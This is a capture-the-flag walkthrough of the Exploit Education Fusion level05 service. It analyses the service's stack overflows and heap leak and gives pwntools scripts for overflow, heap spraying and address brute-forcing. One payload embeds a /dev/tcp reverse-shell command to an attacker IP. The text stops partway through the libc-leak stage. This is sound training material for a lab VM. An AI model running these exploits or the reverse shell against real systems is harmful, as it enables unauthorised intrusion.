Even more information leaks and stack overwrites. This time with random libraries / evented programming styles :>
The description and source code can be found here:
http://exploit.education/fusion/level05/
Source Code Analysis
At a high level, this program allows you to connect to the service and register users into a “database” (it’s just a global array variable). It also lets you send the “database” to a remote host, check names to see if they’ve been registered, and see which registered user is “up” on a port that you specify.
childtask()
This function simply handles each of the program’s available commands:
if (strncmp(buffer, "addreg ", 7) == 0) {
  taskcreate(addreg, strdup(buffer + 7), STACK);
  continue;
}

if (strncmp(buffer, "senddb ", 7) == 0) {
  taskcreate(senddb, strdup(buffer + 7), STACK);
  continue;
}

if (strncmp(buffer, "checkname ", 10) == 0) {
  struct isuparg *isa = calloc(sizeof(struct isuparg), 1);

  isa->fd = cfd;
  isa->string = strdup(buffer + 10);

  taskcreate(checkname, isa, STACK);
  continue;
}

if (strncmp(buffer, "quit", 4) == 0) {
  break;
}

if (strncmp(buffer, "isup ", 5) == 0) {
  struct isuparg *isa = calloc(sizeof(struct isuparg), 1);

  isa->fd = cfd;
  isa->string = strdup(buffer + 5);

  taskcreate(isup, isa, STACK);
}
addreg()
This function lets you register users into a “database” by supplying the command, name, flags (as an integer), and IPv4 address.
static void addreg(void *arg)
{
  char *name, *sflags, *ipv4, *p;
  int h, flags;
  char *line = (char *)(arg);

  name = line;
  p = strchr(line, ' ');
  if (! p) goto bail;
  *p++ = 0;
  sflags = p;
  p = strchr(p, ' ');
  if (! p) goto bail;
  *p++ = 0;
  ipv4 = p;

  flags = atoi(sflags);
  if (flags & ~0xe0) goto bail;

  h = hash(name, strlen(name), REGDB-1);
  registrations[h].flags = flags;
  registrations[h].ipv4 = inet_addr(ipv4);

  printf("registration added successfully\n");

bail:
  free(line);
}
The program performs a check on the “flags” integer you supply. It bails out and nothing is registered unless the value is one of the following: 0, 32, 64, 96, 128, 160, 192, 224 (the only values with no bits set outside 0xe0). There doesn’t seem to be any reason for this, and the flags value doesn’t seem to be used in any meaningful way.
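As a quick sanity check of that list, here is a minimal Python sketch of the same bitmask test. The function name is mine, and Python integers are unbounded, so this only mirrors the C behaviour for the small values shown.

```python
# Mirror of the C check `if (flags & ~0xe0) goto bail;`
MASK = 0xE0  # bits 0x20, 0x40 and 0x80


def passes_flag_check(flags: int) -> bool:
    """Return True when no bit outside 0xe0 is set."""
    return (flags & ~MASK) == 0


# Enumerate every value in 0..255 that addreg() would accept
allowed = [f for f in range(256) if passes_flag_check(f)]
print(allowed)
```

Any other value, including negative ones, sets at least one bit outside the mask and takes the bail path.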
The name supplied is “hashed” with their own custom 7-bit hashing algorithm. That hash is then used as the index for where to save the flags and IPv4 address in the registrations[] array.
An example of using the addreg
command:
andrew ~ $ nc fusion 20005 addreg Andrew 32 10.0.1.4
senddb()
This function has an overflow vulnerability that I will later realize isn’t necessary for exploiting this program. So feel free to skip this section entirely. However, I’ll leave it in for shits & giggles…
static void senddb(void *arg)
{
  unsigned char buffer[512], *p;
  char *host, *l;
  char *line = (char *)(arg);
  int port;
  int fd;
  int i;
  int sz;

  p = buffer;
  sz = sizeof(buffer);
  host = line;
  l = strchr(line, ' ');
  if (! l) goto bail;
  *l++ = 0;
  port = atoi(l);
  if (port == 0) goto bail;

  printf("sending db\n");

  if ((fd = netdial(UDP, host, port)) < 0) goto bail;

  for (sz = 0, p = buffer, i = 0; i < REGDB; i++) {
    if (registrations[i].flags | registrations[i].ipv4) {
      memcpy(p, &registrations[i], sizeof(struct registrations));
      p += sizeof(struct registrations);
      sz += sizeof(struct registrations);
    }
  }

bail:
  fdwrite(fd, buffer, sz);
  close(fd);
  free(line);
}
The for loop copies the data from each non-empty element of the registrations[] array into the buffer[512] array. The registrations[] array can hold up to 128 elements of the registrations struct, which was defined globally earlier:
struct registrations {
  short int flags;
  in_addr_t ipv4;
} __attribute__((packed));

#define REGDB (128)
struct registrations registrations[REGDB];
Since the struct was given the packed attribute, it will only use as much space as needed, which happens to be 6 bytes: two for the short int and four for the in_addr_t. A little math tells us that filling the registrations[] array will take 768 bytes (6 * 128). That’s 256 bytes more than the buffer[512] array.
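The same arithmetic can be checked with Python's struct module. This is just a sketch of the size calculation; the format string is my stand-in for the packed C struct (a 2-byte short followed by a 4-byte unsigned int, with no padding).

```python
import struct

REGDB = 128          # number of slots in registrations[]
BUFFER_SIZE = 512    # size of buffer[] in senddb()

# "<" selects standard sizes with no alignment padding, like a packed struct:
# h = 2-byte short (flags), I = 4-byte unsigned int (ipv4)
entry_size = struct.calcsize("<hI")

total = entry_size * REGDB              # bytes needed if every slot is in use
overflow = total - BUFFER_SIZE          # bytes written past the end of buffer[]
fits = BUFFER_SIZE // entry_size        # whole entries that fit inside buffer[]

print(entry_size, total, overflow, fits)
```

So once more than 85 slots are populated, the copy loop starts writing past the end of the buffer.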
I wrote a short script as a proof of concept:
#!/usr/bin/env python3
from pwn import *
import time
import string
import random

def random_string(size):
    return ''.join(random.choice(string.ascii_letters) for x in range(size))

io = remote("fusion", 20005)
local_ip = "10.0.1.4"
local_port = 4444

log.info("Sending 'addreg' commands")
for i in range(170):
    io.sendline(f"addreg {random_string(32)} 32 17.17.17.17")
    time.sleep(0.1)

log.info("Sending 'senddb' command")
senddb = f"senddb {local_ip} {local_port}\n"
io.send(senddb)
io.close()
Running this script from the attacking VM takes about 20 seconds because of the 0.1 second sleep between each command. Without the sleep, I noticed that several commands would be bunched into a single packet and the buffer wasn’t being overflowed.
andrew ~/level05 $ ./bof.py [+] Opening connection to fusion on port 20005: Done [*] Sending 'addreg' commands [*] Sending 'senddb' command [*] Closed connection to fusion port 20005
On the Fusion VM, we can see the segfault in the kernel messages:
fusion@fusion:~$ dmesg ... [ 2446.051965] level05[1878]: segfault at 20110d ip b764d90e sp b8ff695c error 4 in libc-2.13.so[b75db000+176000]
Hash
I need a list of strings I can use for the “name” field, along with their hashed values. I’ll need to be able to place data at specific positions in the overflowed buffer, and to do that I need to know which index in the registrations[] array each name maps to. I rewrote the hashing algorithm in a Python script and created a loop to hash a bunch of 2-character strings and print the results.
#!/usr/bin/env python3
import string

def hash(name):
    # Python port of the server's hash(); the result is masked to 7 bits (0-127)
    mask = 127
    h = 0xfee13117
    max_int = 0xffffffff  # emulate 32-bit unsigned overflow
    for ch in name:
        h ^= ord(ch)
        h += (h << 11)
        h &= max_int
        h ^= (h >> 7)
        h -= ord(ch)
    # final mixing steps, run once after the per-character loop
    h += (h << 3)
    h &= max_int
    h ^= (h >> 10)
    h += (h << 15)
    h &= max_int
    h -= (h >> 17)
    return (h & mask)

if __name__ == "__main__":
    all_chars = string.ascii_letters + string.digits  #+ string.punctuation
    for a in all_chars:
        for b in all_chars:
            name = a + b
            h = hash(name)
            print(f"{h}\t{name}")
checkname()
There exists another buffer overflow in the get_and_hash() function, which is called by checkname().
int get_and_hash(int maxsz, char *string, char separator)
{
  char name[32];
  int i;

  if (maxsz > 32) return 0;

  for (i = 0; i < maxsz, string[i]; i++) {
    if (string[i] == separator) break;
    name[i] = string[i];
  }

  return hash(name, strlen(name), 0x7f);
}

struct isuparg {
  int fd;
  char *string;
};

static void checkname(void *arg)
{
  struct isuparg *isa = (struct isuparg *)(arg);
  int h;

  h = get_and_hash(32, isa->string, '@');

  fdprintf(isa->fd, "%s is %sindexed already\n", isa->string,
      registrations[h].ipv4 ? "" : "not ");
}
The checkname() function takes the string the user supplied after the “checkname ” command and sends it to the get_and_hash() function. It looks like the intention is to loop through each character of that string, save it to the name[32] variable, and stop when the supplied string ends, the '@' separator is found, or it reaches the maximum size of 32.
Except, that’s not how this works. Admittedly, it took me a long time to spot this myself as I’m not a C developer. The comma operator in the for loop evaluates both expressions but returns only the value of the last one, so the condition ignores i < maxsz and keeps looping while string[i] exists.
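To illustrate the difference, here is a small Python simulation of the copy loop. It is only a model of the C control flow (the function and its `buggy` switch are mine), not code from the level.

```python
def bytes_copied(data: bytes, maxsz: int = 32, separator: int = ord("@"), buggy: bool = True) -> int:
    """Return how many bytes the copy loop would write into name[]."""
    i = 0
    while True:
        at_end = i >= len(data) or data[i] == 0    # string[i] == '\0'
        if buggy:
            keep_going = not at_end                # `i < maxsz, string[i]`: only string[i] decides
        else:
            keep_going = i < maxsz and not at_end  # `i < maxsz && string[i]`: presumably the intent
        if not keep_going or data[i] == separator:
            break
        i += 1
    return i


print(bytes_copied(b"A" * 50))               # 50: the buggy loop runs past name[32]
print(bytes_copied(b"A" * 50, buggy=False))  # 32: a bounded loop would stop here
print(bytes_copied(b"bob@example"))          # 3: copying stops at the separator
```

With the comma operator, only a null byte or the '@' separator ends the copy, so anything longer than 32 bytes spills past name[].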
We can test this out by sending the “checkname” command followed by a string that we know will overflow the buffer and overwrite the saved EIP pointer.
andrew ~/level05 $ python3 -c 'print("checkname " + "A"*50)' | nc fusion 20005 ** welcome to level05 **
The dmesg
command on the Fusion VM will show that we have full control over the EIP register.
fusion@fusion ~ $ dmesg [10664.771069] level05[3230]: segfault at 41414141 ip 41414141 sp b929ebb0 error 14
This alone will not do much for us, as everything is randomized. Even the addresses of the code are random, as it’s a Position Independent Executable. But we’ll see later how this can be used.
Note that the get_and_hash() function does NOT null-terminate the name[] string. Because leftover data is already on the stack, the name passed to the hash() function is rarely the same as what the user submitted. So usually, you’ll get the message that the name “is not indexed already”.
isup()
The “isup” command takes two arguments (for some reason): almost anything is accepted for the first, and the second must be a valid port number. It simply goes through all the registered “names” in its database and attempts to connect to each of them via UDP on the port that was specified. If the host is listening on that port, the server sends it part of its registration info.
static void isup(void *arg)
{
  unsigned char buffer[512], *p;
  char *host, *l;
  struct isuparg *isa = (struct isuparg *)(arg);
  int port;
  int fd;
  int i;
  int sz;

  // skip over first arg, get port
  l = strchr(isa->string, ' ');
  if (! l) return;
  *l++ = 0;

  port = atoi(l);
  host = malloc(64);

  for (i = 0; i < 128; i++) {
    p = (unsigned char *)(& registrations[i]);
    if (! registrations[i].ipv4) continue;

    sprintf(host, "%d.%d.%d.%d",
        (registrations[i].ipv4 >> 0) & 0xff,
        (registrations[i].ipv4 >> 8) & 0xff,
        (registrations[i].ipv4 >> 16) & 0xff,
        (registrations[i].ipv4 >> 24) & 0xff);

    if ((fd = netdial(UDP, host, port)) < 0) {
      continue;
    }

    buffer[0] = 0xc0;
    memcpy(buffer + 1, p, sizeof(struct registrations));
    buffer[5] = buffer[6] = buffer[7] = 0;

    fdwrite(fd, buffer, 8);
    close(fd);
  }

  free(host);
}
Something important to note is that before the call to isup() (take a look back at the childtask() function), the buffer variable that contains the user-supplied data is put through strdup(), which allocates space for it on the heap. However, the pointer returned from that never gets freed.
Exploitation
Heap Spraying
Because memory in the heap is not properly freed after being allocated with the “isup” command, we can fill the heap with our own data. We will then overwrite the pointer that checkname() uses to read isa->fd and try to get it to point to somewhere in the heap (more on that later). We’ll need to include a string that can get us a reverse shell to pass as an argument to system(), as well as the value for the file descriptor, which happens to always be 0x4. That allows the program to send data back to us. Since the descriptor fills a 32-bit integer, there will be some null bytes involved, which means it’ll need to be at the end of our data.
We’ll need to get an idea of where the heap base address may be and where it could possibly end. The more data we fill the heap with, the better chance we’ll have of finding a valid address later. However, we don’t need to fill it up completely, so we’ll try to be smart about it.
Some of the processes had heap space starting with 0x0 instead of 0xb. Our “level05” process (and all the other levels) always start with 0xb:
root ~ # cat /proc/$(pidof level05)/maps b7648000-b768a000 rw-p 00000000 00:00 0 b768a000-b7800000 r-xp 00000000 07:00 92669 /lib/i386-linux-gnu/libc-2.13.so b7800000-b7802000 r--p 00176000 07:00 92669 /lib/i386-linux-gnu/libc-2.13.so b7802000-b7803000 rw-p 00178000 07:00 92669 /lib/i386-linux-gnu/libc-2.13.so b7803000-b7806000 rw-p 00000000 00:00 0 b7810000-b7812000 rw-p 00000000 00:00 0 b7812000-b7813000 r-xp 00000000 00:00 0 [vdso] b7813000-b7831000 r-xp 00000000 07:00 92553 /lib/i386-linux-gnu/ld-2.13.so b7831000-b7832000 r--p 0001d000 07:00 92553 /lib/i386-linux-gnu/ld-2.13.so b7832000-b7833000 rw-p 0001e000 07:00 92553 /lib/i386-linux-gnu/ld-2.13.so b7833000-b7839000 r-xp 00000000 07:00 75280 /opt/fusion/bin/level05 b7839000-b783a000 rw-p 00006000 07:00 75280 /opt/fusion/bin/level05 b783a000-b783d000 rw-p 00000000 00:00 0 b9270000-b9291000 rw-p 00000000 00:00 0 [heap] bfb7d000-bfb9e000 rw-p 00000000 00:00 0 [stack]
Let’s look at the heap space addresses for the various processes on the Fusion VM:
root ~ # cat /proc/*/maps | grep heap | grep ^b | sort b7815000-b7836000 rw-p 00000000 00:00 0 [heap] b7b7c000-b7b9d000 rw-p 00000000 00:00 0 [heap] b7d46000-b7d67000 rw-p 00000000 00:00 0 [heap] b7d46000-b7d67000 rw-p 00000000 00:00 0 [heap] b7d46000-b7d67000 rw-p 00000000 00:00 0 [heap] b7d67000-b7d88000 rw-p 00000000 00:00 0 [heap] b7d67000-b7d88000 rw-p 00000000 00:00 0 [heap] b7d67000-b7da7000 rw-p 00000000 00:00 0 [heap] b7e4c000-b7e6d000 rw-p 00000000 00:00 0 [heap] b7e90000-b7ed7000 rw-p 00000000 00:00 0 [heap] b82b7000-b82d8000 rw-p 00000000 00:00 0 [heap] b8336000-b8357000 rw-p 00000000 00:00 0 [heap] b837f000-b83a0000 rw-p 00000000 00:00 0 [heap] b8ae1000-b8b44000 rw-p 00000000 00:00 0 [heap] b8e0b000-b8e46000 rw-p 00000000 00:00 0 [heap] b8e0b000-b8e46000 rw-p 00000000 00:00 0 [heap] b8e32000-b8e53000 rw-p 00000000 00:00 0 [heap] b9270000-b9291000 rw-p 00000000 00:00 0 [heap] b9647000-b9668000 rw-p 00000000 00:00 0 [heap]
We can see that it generally ranges between 0xb7815000 and 0xb9668000 (lowest address to highest address), the difference of which is 0x1e53000. That’s 31,797,248 in decimal. The childtask() function stores each command into a buffer with a maximum size of 512 bytes. In addition, you’ll see later that another 16 bytes of heap space is taken up to store the file descriptor each time. This means we’d need to send the “isup” command (the one we’re using for heap spraying) 60,222 times (31,797,248 ÷ (512 + 16)). Let’s take a look at what the heap looks like when we send data. First, I’ll attach to the “level05” process from the Fusion VM using gdbserver:
root ~ # gdbserver --attach :1234 $(pidof level05) Attached; pid = 4819 Listening on port 1234
Then I’ll connect to it from GDB on my attacking VM (note that I copied the level05 binary to my attacking machine so that I could have GDB read the symbols):
andrew ~/level05 $ gdb GEF for linux ready, type `gef' to start, `gef config' to configure 92 commands loaded for GDB 9.2 using Python engine 3.8 gef➤ file level05 Reading symbols from level05... gef➤ target remote 10.0.1.5:1234 Remote debugging using 10.0.1.5:1234 ... gef➤ c Continuing.
Now I’ll send some data:
andrew ~/level05 $ echo "isup $(pwn cyclic 512)" | nc fusion 20005 ** welcome to level05 **
And check the heap:
^C Program received signal SIGINT, Interrupt. ... gef➤ heap chunks Chunk(addr=0xb91fd008, size=0x108, flags=PREV_INUSE) [0xb91fd008 08 b0 5c b7 10 d1 1f b9 b0 54 20 b9 60 da 20 b9 ..\......T .`. .] Chunk(addr=0xb91fd110, size=0x83a0, flags=PREV_INUSE) [0xb91fd110 66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00 fdtask..........] Chunk(addr=0xb92054b0, size=0x83a0, flags=PREV_INUSE) [0xb92054b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................] Chunk(addr=0xb920d850, size=0x10, flags=PREV_INUSE) [0xb920d850 04 00 00 00 60 d8 20 b9 00 00 00 00 01 02 00 00 ....`. .........] Chunk(addr=0xb920d860, size=0x200, flags=PREV_INUSE) [0xb920d860 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 aaaabaaacaaadaaa] Chunk(addr=0xb920da60, size=0x105a8, flags=PREV_INUSE) ← top chunk gef➤ x/128wx 0xb920d860 0xb920d860: 0x61616161 0x61616162 0x61616163 0x61616164 0xb920d870: 0x61616165 0x61616166 0x61616167 0x61616168 0xb920d880: 0x61616169 0x6161616a 0x6161616b 0x6161616c 0xb920d890: 0x6161616d 0x6161616e 0x6161616f 0x61616170 0xb920d8a0: 0x61616171 0x61616172 0x61616173 0x61616174 0xb920d8b0: 0x61616175 0x61616176 0x61616177 0x61616178 0xb920d8c0: 0x61616179 0x6261617a 0x62616162 0x62616163 0xb920d8d0: 0x62616164 0x62616165 0x62616166 0x62616167 0xb920d8e0: 0x62616168 0x62616169 0x6261616a 0x6261616b 0xb920d8f0: 0x6261616c 0x6261616d 0x6261616e 0x6261616f 0xb920d900: 0x62616170 0x62616171 0x62616172 0x62616173 0xb920d910: 0x62616174 0x62616175 0x62616176 0x62616177 0xb920d920: 0x62616178 0x62616179 0x6361617a 0x63616162 0xb920d930: 0x63616163 0x63616164 0x63616165 0x63616166 0xb920d940: 0x63616167 0x63616168 0x63616169 0x6361616a 0xb920d950: 0x6361616b 0x6361616c 0x6361616d 0x6361616e 0xb920d960: 0x6361616f 0x63616170 0x63616171 0x63616172 0xb920d970: 0x63616173 0x63616174 0x63616175 0x63616176 0xb920d980: 0x63616177 0x63616178 0x63616179 0x6461617a 0xb920d990: 0x64616162 0x64616163 0x64616164 0x64616165 0xb920d9a0: 0x64616166 0x64616167 0x64616168 0x64616169 
0xb920d9b0: 0x6461616a 0x6461616b 0x6461616c 0x6461616d 0xb920d9c0: 0x6461616e 0x6461616f 0x64616170 0x64616171 0xb920d9d0: 0x64616172 0x64616173 0x64616174 0x64616175 0xb920d9e0: 0x64616176 0x64616177 0x64616178 0x64616179 0xb920d9f0: 0x6561617a 0x65616162 0x65616163 0x65616164 0xb920da00: 0x65616165 0x65616166 0x65616167 0x65616168 0xb920da10: 0x65616169 0x6561616a 0x6561616b 0x6561616c 0xb920da20: 0x6561616d 0x6561616e 0x6561616f 0x65616170 0xb920da30: 0x65616171 0x65616172 0x65616173 0x65616174 0xb920da40: 0x65616175 0x65616176 0x65616177 0x65616178 0xb920da50: 0x65616179 0x6661617a 0x00616162 0x000105a9
The last full word value here (the last one that doesn’t contain a null byte) is 0x6661617a. We’ll find the offset of that and add our 0x4 value afterward in the heap spray script:
andrew ~/level05 $ pwn cyclic -l 0x6661617a 500
That means we can put 504 characters of padding (the 500 number does not include the 4 characters of the last full word value) in the buffer before our file descriptor value. Here’s a script I came up with for spraying the heap:
#!/usr/bin/env python3
from pwn import *
from time import sleep

buff_sz = 504
command = b"isup "
content = b"ABC "
content += b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; "  # 44 bytes
content += b"A" * (buff_sz - len(content))
content += pack(4)

io = remote("fusion", 20005)
log.info(io.recvline())

max_spray = 60222
with log.progress('Spraying') as p:
    for i in range(max_spray):
        io.send(command + content)
        p.status(f"{(i/max_spray):.2%}")
        sleep(0.005)
A couple of notes:
- The “content” variable starts with “ABC ” because the first space in our content will get turned into a null byte. We can’t have that happen in the middle of our reverse shell string. Also I needed a unique value, like “ABC”, later on when I’m checking the returned data.
- I need to add that small sleep value because without it, some of the requests get lumped together into a single packet. If that happens, only the first request is valid and the rest are ignored.
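The numbers used in the spray script can be re-derived without pwntools. The sketch below rebuilds the payload with the standard struct module (struct.pack("<I", 4) produces the same four bytes as pack(4) under pwntools' default 32-bit little-endian context) and recomputes the spray count from the heap range observed earlier. The variable names are mine.

```python
import struct

BUFF_SZ = 504  # padding length before the fd value, from the cyclic offset
shell = b"/bin/sh > /dev/tcp/10.0.1.4/1337 0>&1 2>&1; "

content = b"ABC " + shell                    # the space after ABC becomes a null byte on the server
content += b"A" * (BUFF_SZ - len(content))   # pad out to 504 bytes
content += struct.pack("<I", 4)              # fd value 0x00000004, little-endian

# Spray count: observed heap range divided by the heap space used per request
heap_low, heap_high = 0xB7815000, 0xB9668000
per_request = 512 + 16                       # command buffer + 16 bytes for the fd/pointer pair
max_spray = (heap_high - heap_low) // per_request

print(len(shell), len(content), max_spray)
```

The three null bytes of the fd value land at the very end of the payload, which is why the descriptor has to come last.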
Running the script takes about 8 minutes:
andrew ~/level05 $ time ./3_spray.py [+] Opening connection to fusion on port 20005: Done [*] ** welcome to level05 ** [+] Spraying: Done real 8m17.777s user 0m21.451s sys 1m28.634s
Leaking the File Descriptor
Now that we’ve got the heap filled with data, we can look at the addresses there and try to find a pattern to make our address guessing a bit smarter:
gef➤ heap chunks Chunk(addr=0xb8759008, size=0x108, flags=PREV_INUSE) [0xb8759008 08 b0 60 b7 10 91 75 b8 b0 14 76 b8 70 9c 76 b8 ..`...u...v.p.v.] Chunk(addr=0xb8759110, size=0x83a0, flags=PREV_INUSE) [0xb8759110 66 64 74 61 73 6b 00 00 00 00 00 00 00 00 00 00 fdtask..........] Chunk(addr=0xb87614b0, size=0x83a0, flags=PREV_INUSE) [0xb87614b0 30 64 7c b7 30 64 7c b7 00 00 00 00 00 00 00 00 0d|.0d|.........] Chunk(addr=0xb8769850, size=0x10, flags=) [0xb8769850 04 00 00 00 60 98 76 b8 00 00 00 00 01 02 00 00 ....`.v.........] Chunk(addr=0xb8769860, size=0x200, flags=PREV_INUSE) [0xb8769860 41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64 AAA./bin/sh > /d] Chunk(addr=0xb8769a60, size=0x10, flags=PREV_INUSE) [0xb8769a60 04 00 00 00 70 9a 76 b8 00 00 00 00 01 02 00 00 ....p.v.........] Chunk(addr=0xb8769a70, size=0x200, flags=PREV_INUSE) [0xb8769a70 41 41 41 00 2f 62 69 6e 2f 73 68 20 3e 20 2f 64 AAA./bin/sh > /d] ...
We can see that the address of each chunk is 16-byte aligned and ends with 0.
Let’s look at the contents of a single chunk:
gef➤ x/128wx 0xb8769860 0xb8769860: 0x00414141 0x6e69622f 0x2068732f 0x642f203e 0xb8769870: 0x742f7665 0x312f7063 0x2e302e30 0x2f342e31 0xb8769880: 0x37333331 0x263e3020 0x3e322031 0x203b3126 0xb8769890: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87698f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769900: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769910: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769920: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769930: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769940: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769950: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769960: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769970: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769980: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769990: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb87699f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a00: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a10: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a20: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a30: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a40: 0x41414141 0x41414141 0x41414141 0x41414141 0xb8769a50: 0x41414141 0x41414141 0x00000004 0x00000011
The file descriptor that we included at the end (0x00000004
) will always have an address ending with 8.
Let’s look at the tail end of the disassembly (from Ghidra) for the get_and_hash()
function:
000127ab ADD ESP, 0x2c 000127ae POP ESI 000127af POP EDI 000127b0 POP EBP 000127b1 RET
The stack includes 44 bytes (0x2c) of space, followed by saved values for the ESI, EDI, EBP, and EIP registers. Once execution is returned to the checkname()
function, a few things happen but we’ll see what happens to the value in the ESI register before fdprintf()
is called:
0001282b MOV EAX, dword ptr [ESI] 0001282d MOV dword ptr [ESP], EAX 00012830 CALL fdprintf
It gets saved to the top of the stack as the first argument to fdprintf()
. This tells us that it’s the pointer to the file descriptor.
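To make the stack layout concrete, here is a small sketch (mine, not part of the level's source) that computes where each saved register sits relative to the start of name[]. It assumes name[32] sits directly below the saved ESI, which is consistent with the 32-byte and 44-byte paddings used by the scripts in this write-up.

```python
import struct

NAME_SIZE = 32                               # char name[32] in get_and_hash()
SAVED_REGS = ["esi", "edi", "ebp", "eip"]    # popped in this order by the epilogue

# Offset of each saved 4-byte slot from the start of name[] (assumed layout)
offsets = {reg: NAME_SIZE + 4 * i for i, reg in enumerate(SAVED_REGS)}


def overwrite_esi(pointer: int) -> bytes:
    """Build a checkname line whose overflow replaces only the saved ESI."""
    return b"checkname " + b"A" * offsets["esi"] + struct.pack("<I", pointer)


print(offsets)
print(overwrite_esi(0xB9700108))
```

Whatever pointer lands in the saved ESI slot is what checkname() dereferences to fetch the file descriptor after get_and_hash() returns.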
Now, I’ll write a script to find a valid file descriptor address in our heap space.
#!/usr/bin/env python3
from pwn import *
import sys

start_addr = 0xb9700108
content = b"checkname "
content += b"A" * 32

io = remote("fusion", 20005)
log.info(io.recvline())

log.info("Sending 'checkname' commands")
for addr in range(start_addr, start_addr+528, 16):
    io.sendline(content + p32(addr))
    data = io.recvline(timeout=0.1)
    if b"indexed already" in data:
        log.success(f"Found address = {addr:#010x}")
        log.info(f"Reverse shell string should be at {addr+28:#010x}")
        sys.exit()

log.warning("File descriptor address not found!")
Choosing the address to start guessing with (the start_addr value) can be tricky. If it’s outside the heap and it’s an invalid address, the program will crash and we’ll need to start over again by spraying the heap. I chose that starting address (0xb9700108) because I looked at all the heap starting addresses for the other processes on the system and didn’t see any that start above that, so it should be safe. I also know that with the amount of data we’re spraying the heap with, it’s not so high that it lands above the allocated heap space. And I know that the file descriptor address will always end with 8.
You can see that the for loop will only run through 33 times (528 ÷ 16). That should be the maximum number of guesses needed to find the file descriptor.
andrew ~/level05 $ ./leak_fd.py [+] Opening connection to fusion on port 20005: Done [*] ** welcome to level05 ** [*] Sending 'checkname' commands [+] File descriptor address = 0xb9700208 [*] Reverse shell string should be at 0xb9700224
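The guessing window can be reproduced offline. This sketch only redoes the address arithmetic (no network traffic) and uses the address reported in the run above as a sample hit.

```python
START_ADDR = 0xB9700108
CHUNK_STRIDE = 528   # 512-byte string chunk + 16-byte fd/pointer chunk
STEP = 16            # chunk addresses are 16-byte aligned

# Every address the leak script would try
candidates = list(range(START_ADDR, START_ADDR + CHUNK_STRIDE, STEP))

print(len(candidates))                                # number of guesses
print(all(addr & 0xF == 8 for addr in candidates))    # every guess ends in 8

hit = 0xB9700208                                      # address found in the run above
print(hit in candidates, hex(hit + 28))               # shell string is 28 bytes further on
```

Because the sprayed pattern repeats every 528 bytes, one window of that size should be enough to cross a trailing fd value, as long as the window lies inside the sprayed region.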
Leaking a Libc Address
The goal here is to call the system() function from libc and pass it a pointer to our reverse shell string. To get its address, we would normally leak it from the .got.plt section, which is where the program stores the resolved addresses of the libc (and other shared library) functions it calls. However, the system() function is never called in this binary, so it has no entry in the .got.plt section. We’ll need to leak another function’s address and calculate the offset from that to system(). In this case, I’ll be leaking the write() function’s address.
First, I’m going to find the system()
and write()
offsets:
# readelf -s /lib/i386-linux-gnu/libc-2.13.so | grep -E ' system@| write@' 1409: 0003cb20 139 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0 2247: 000c12c0 128 FUNC WEAK DEFAULT 12 write@@GLIBC_2.0
A little hex math tells us that 0xc12c0 – 0x3cb20 = 0x847a0. So, whichever address we find for write()
, we just need to subtract 0x847a0 from it in order to get the system()
function address.
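Here is that subtraction as a tiny helper. The two offsets come from the readelf output above; the sample write() address is the one leaked in a run shown later in this write-up, and the helper name is mine.

```python
WRITE_OFFSET = 0x000C12C0    # write@@GLIBC_2.0 (from readelf)
SYSTEM_OFFSET = 0x0003CB20   # system@@GLIBC_2.0 (from readelf)
DELTA = WRITE_OFFSET - SYSTEM_OFFSET


def system_from_write(write_addr: int) -> int:
    """Derive the runtime address of system() from a leaked write() address."""
    return write_addr - DELTA


leaked_write = 0xB778D2C0                    # sample leak from a later run
libc_base = leaked_write - WRITE_OFFSET      # should be page-aligned if the leak is right

print(hex(DELTA))
print(hex(system_from_write(leaked_write)))
print(hex(libc_base))
```

Checking that the implied libc base ends in 000 is a cheap way to catch a bad leak before using the computed system() address.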
The only reason this exploit will work is because the heap contains a few addresses of functions in our code, presumably because the chunk is not properly freed. Let’s look for those. The steps I’m taking here:
- Print the address of the childtask() function
- Search for that address in memory
- Show the heap chunks (NOTE: If you do this after spraying the heap, it will take a LONG time and try to display ALL of the chunks. Hit Ctrl+C immediately after using the heap chunks command to get just the first few.)
- Get the difference between the address of the start of my heap spraying and the childtask() pointer location
- Divide that difference by 4
- Use the dereference command to show the last 34 word values of that large chunk before our heap spraying
